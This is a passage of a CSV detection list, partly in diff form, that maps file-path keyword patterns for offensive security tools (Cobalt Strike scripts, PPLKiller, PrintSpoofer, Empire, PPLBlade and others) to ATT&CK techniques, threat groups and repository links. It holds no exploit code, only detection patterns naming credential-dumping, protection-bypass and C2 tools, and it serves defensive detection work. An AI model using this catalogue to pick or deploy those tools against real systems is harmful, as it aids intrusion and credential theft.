 "*/PowerView.cna*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z"
 "*/PowerView.ps1*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z"
 "*/PowerView3.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z"
@@ -4779,98 +4824,100 @@
 "*/PPLBlade.git*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z"
 "*/ppldump.*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z"
 "*/PPLDump_BOF/*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z"
-"*/PPLFault/*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z"
-"*/PPLKiller.git*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","744","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z"
-"*/PPLKiller/*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","744","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z"
+"*/PPLFault/*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z"
+"*/PPLKiller.git*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z"
+"*/PPLKiller/*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z"
 "*/pptp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/prepare.sh shell/mod_*.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z"
 "*/PrimusC2*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z"
 "*/PrimusC2.git*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z"
-"*/printerbug.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z"
-"*/PrintMonitorDll.*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z"
-"*/PrintMonitorDll/*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z"
-"*/PrintSpoofer.git*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z"
-"*/PrintSpoofer.git*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z"
+"*/printerbug.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z"
+"*/PrintMonitorDll.*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z"
+"*/PrintMonitorDll/*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z"
+"*/printnightmare.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/PrintSpoofer.git*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z"
+"*/PrintSpoofer.git*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z"
 "*/PrintSpoofer/*","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","76","8","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z"
 "*/Priv_Esc.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z"
-"*/privesc/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
-"*/PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*/privesc/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*/PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
 "*/PrivExchange*","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z"
 "*/PrivExchange.git*","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z"
 "*/PrivFu.git*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z"
-"*/PrivilegeEscalation/*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/PrivilegeEscalation/*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/Privileger.git*","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","117","25","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" "*/PrivKit.git*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*/PrivKit/*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - 
T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*/proberbyte.go*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus 